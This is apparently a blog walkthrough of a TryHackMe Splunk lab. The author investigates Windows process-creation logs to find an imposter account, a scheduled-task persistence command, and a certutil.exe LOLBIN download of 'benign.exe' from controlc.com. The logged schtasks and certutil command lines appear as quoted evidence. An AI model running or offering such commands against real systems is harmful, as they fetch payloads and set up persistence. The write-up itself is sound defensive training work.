Benign - TryHackMe

Forrest CaffrayForrest Caffray
4 min read

Link to room: https://tryhackme.com/room/benign

One of the client’s IDS indicated a potentially suspicious process execution indicating one of the hosts from the HR department was compromised. Some tools related to network information gathering / scheduled tasks were executed which confirmed the suspicion. Due to limited resources, we could only pull the process execution logs with Event ID: 4688 and ingested them into Splunk with the index win_eventlogs for further investigation.


How many logs are ingested from the month of March, 2022?

We want to set index="win_eventlogs" in the new Search and set the date range for the duration of March 2022:

We can see the result here:

= 13959


Imposter Alert: There seems to be an imposter account observed in the logs, what is the name of that user?

To find this I filtered via UserName field and then Rare values and noticed this:

There is a UserName of Amelia which seems innocent enough, but as you can also see there is a UserName of Amel1a which definitely does not seem so innocent.

= Amel1a


Which user from the HR department was observed to be running scheduled tasks?

I searched for index="win_eventlogs" schtasks as a sort of blanket to see what pops up.

I got 87 events, so still a bit too much to look through. We are looking at which user, so clicked on UserName in Fields and spotted this:

Just one count for Chris.fort with this CommandLine being of interest:

CommandLine: /create /tn OfficUpdater /tr "C:\Users\Chris.fort\AppData\Local\Temp\update.exe" /sc onstart

= Chris.fort


Which user from the HR department executed a system process (LOLBIN) to download a payload from a file-sharing host.

There is a hint to checkout https://lolbas-project.github.io/, so let’s go ahead and do just that! These are all Binaries, Scripts and Libraries default to the system, ready to be used.

We are also looking at the HR department which consists of:

HR department

  • Haroon

  • Chris

  • Diana

So we are looking at Haroon, Chris or Diana using one of the LOBAS listed on the github.io page. There’s too many results to filter via UserName in this instance and perhaps too many LOLBIN processes.

However, we know that they downloaded a payload, so an elegant way of filtering might be by adding:

CommandLine="*http*" OR CommandLine="*https*"

Indeed we get 1 results from Haroon:

 { [-]
   Category: Process Creation
   Channel: Windows
   CommandLine:  certutil.exe -urlcache -f - https://controlc.com/e4d11035 benign.exe
   EventID: 4688
   EventTime: 2022-03-04T10:38:28Z
   EventType: AUDIT_SUCCESS
   HostName: HR_01
   NewProcessId: 0x82194b
   Opcode: Info
   ProcessID: 9912
   ProcessName: C:\Windows\System32\certutil.exe
   Severity: INFO
   SeverityValue: 2
   SourceModuleName: eventlog
   SourceModuleType: Win_event_log
   SourceName: Microsoft-Windows-Security-Auditing
   SubjectDomainName: cybertees.local
   UserName: haroon
   index: winlogs
}

this snippet being a bit juicy:

CommandLine: certutil.exe -urlcache -f - https://controlc.com/e4d11035 benign.exe

We can see they used certutil.exe that is listed on the github page with description of “Windows binary used for handling certificates”

= haroon


To bypass the security controls, which system process (lolbin) was used to download a payload from the internet?

Well, we already answered this!

= certutil.exe


What was the date that this binary was executed by the infected host? format (YYYY-MM-DD)

We can look at the exact same results and notice this line:

EventTime: 2022-03-04T10:38:28Z

= 2022-03-04


Which third-party site was accessed to download the malicious payload?

Again, all the information is there, looking at:

CommandLine: certutil.exe -urlcache -f - https://controlc.com/e4d11035 benign.exe

= controlc.com


What is the name of the file that was saved on the host machine from the C2 server during the post-exploitation phase?

We can see from:

CommandLine: certutil.exe -urlcache -f - https://controlc.com/e4d11035 benign.exe

= benign.exe


The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{..........}; what is that pattern?

For this one I just navigated to https://controlc.com/e4d11035

Upon finding the flag

= THM{________}


What is the URL that the infected host connected to?

We already know this :)

= https://controlc.com/e4d11035


I enjoyed this wee exercise getting more familiar with Splunk, hope this write up helped!

0
Subscribe to my newsletter

Read articles from Forrest Caffray directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Forrest Caffray
Forrest Caffray